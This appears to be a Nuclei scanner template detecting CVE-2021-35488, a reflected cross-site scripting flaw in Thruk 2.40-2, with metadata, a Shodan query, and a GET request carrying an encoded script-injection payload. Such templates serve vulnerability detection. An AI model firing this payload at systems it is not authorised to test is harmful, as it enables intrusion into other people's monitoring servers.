id: CVE-2021-35488 info: name: Thruk 2.40-2 - Cross-Site Scripting author: arafatansari severity: medium description: | Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined&title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user. remediation: | Upgrade to a patched version of Thruk or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.gruppotim.it/redteam - https://www.thruk.org/changelog.html - https://nvd.nist.gov/vuln/detail/CVE-2021-35488 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-35488 cwe-id: CWE-79 epss-score: 0.00145 epss-percentile: 0.50195 cpe: cpe:2.3:a:thruk:thruk:2.40-2:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: thruk product: thruk shodan-query: http.html:"Thruk" tags: cve,cve2021,thruk,xss http: - method: GET path: - "{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - "'>" - "Thruk Monitoring" condition: and - type: status status: - 401 # digest: 4b0a0048304602210095da3c3f29f20bf4eef159e092d736f00fdd0a6335e0349584df33976b2fb6dd022100a56f23ef07cab9c6e1edf44e68af92170da4eb554d781eff282ea115b1de52a8:922c64590222798bb761d5b6d8e72950